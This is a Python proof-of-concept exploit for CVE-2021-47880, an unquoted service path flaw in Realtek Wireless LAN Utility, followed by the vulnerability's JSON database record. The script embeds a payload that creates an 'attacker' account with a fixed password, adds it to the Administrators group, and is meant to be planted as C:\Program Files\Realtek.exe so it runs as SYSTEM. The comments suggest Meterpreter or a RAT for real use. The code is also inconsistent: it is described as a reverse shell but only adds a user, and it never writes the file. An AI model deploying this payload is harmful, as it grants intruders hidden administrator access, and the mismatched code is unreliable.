CVE-2021-47880

# CVE-2021-47880 PoC - Malicious executable placement # Save this as Realtek.exe and place in C:\Program Files\ # When Realtek Wireless LAN Utility service restarts, it will execute this file with SYSTEM privileges import os import sys import shutil def create_malicious_executable(): """ Create a malicious executable that will be placed in the unquoted path This creates a reverse shell payload for privilege escalation """ # Target path for the malicious executable target_path = r'C:\Program Files\Realtek.exe' # Payload: Create a new user with admin privileges and add to Administrators group # This is a simple demonstration - in real attack, use meterpreter or other RAT payload_code = ''' import os import subprocess # Add new administrator user try: # Create new user subprocess.run(['net', 'user', 'attacker', 'P@ssw0rd123', '/add'], capture_output=True) # Add to administrators group subprocess.run(['net', 'localgroup', 'Administrators', 'attacker', '/add'], capture_output=True) # Log the successful exploitation with open('C:\\Windows\\Temp\\privesc_log.txt', 'a') as f: f.write('[+] Privilege escalation successful via CVE-2021-47880\\n') except Exception as e: pass ''' # For actual exploitation, compile to executable or use existing tools # This PoC demonstrates the concept print(f'[*] PoC for CVE-2021-47880') print(f'[*] This demonstrates placing malicious executable at unquoted service path') print(f'[*] Target: {target_path}') print(f'[*] In real attack, place compiled executable at this location') print(f'[*] Service: Realtek Wireless LAN Utility (rtkwlan.exe)') # Check if we can write to the target path (for demonstration) if os.path.exists(os.path.dirname(target_path)): print(f'[+] Directory exists, potential for exploitation') return target_path def check_vulnerability(): """ Check if the system is vulnerable to CVE-2021-47880 """ service_path = r'C:\Program Files\Realtek\Wireless LAN Utility\rtkwlan.exe' # Check if service executable exists if os.path.exists(service_path): print(f'[+] Service executable found at: {service_path}') print(f'[+] System may be vulnerable to unquoted service path') return True else: print(f'[-] Service executable not found') return False if __name__ == '__main__': check_vulnerability()

{"cve": {"id": "CVE-2021-47880", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.257", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Realtek Wireless LAN Utility 700.1631 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted service path by inserting malicious code in the system root path that would execute during application startup or system reboot."}, {"lang": "es", "value": "Realtek Wireless LAN Utility 700.1631 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar código potencialmente con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio sin comillas insertando código malicioso en la ruta raíz del sistema que se ejecutaría durante el inicio de la aplicación o el reinicio del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49646", "source": "[email protected]"}, {"url": "https://www.realtek.com/en/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/realtek-wireless-lan-utility-realteknsu-unquoted-service-path", "source": "[email protected]"}]}}